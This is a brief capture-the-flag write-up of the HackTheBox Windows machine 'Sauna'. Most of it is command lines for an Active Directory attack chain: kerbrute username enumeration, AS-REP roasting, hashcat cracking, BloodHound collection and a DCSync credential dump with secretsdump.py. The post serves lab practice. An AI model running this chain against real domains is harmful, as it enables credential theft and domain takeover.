Post

Sauna @ HackTheBox

Sauna is a 20-point Windows Machine on HackTheBox. For user, we bruteforce usernames and then use ASREP-Roasting to obtain the hash of one the users. For root, we find the logon password for an account that has DCSync privileges and then use secretsdump.py to execute the attack. My walkthrough is available on youtube.

Notes

Kerbrute

1
kerbrute userenum -d egotistical-bank.local xato-net-10-million-usernames.txt --dc sauna.htb

ASREPRoast

1
GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt -dc-ip sauna.htb 

Hashcat

1
hashcat -m 18200 asrep.txt rockyou.txt

Dnschef

1
sudo sh -c 'python3 dnschef.py --fakeip 10.10.10.175 --fakedomains egotistical-bank.local -q'

Bloodhound

1
bloodhound-python -c all -u svc_loanmgr -p 'password' -d egotistical-bank.local -dc egotistical-bank.local -ns 127.0.0.1

Secretsdump

1
secretsdump.py 'egotistical-bank/svc_loanmgr:password@sauna.htb'
This post is licensed under CC BY 4.0 by the author.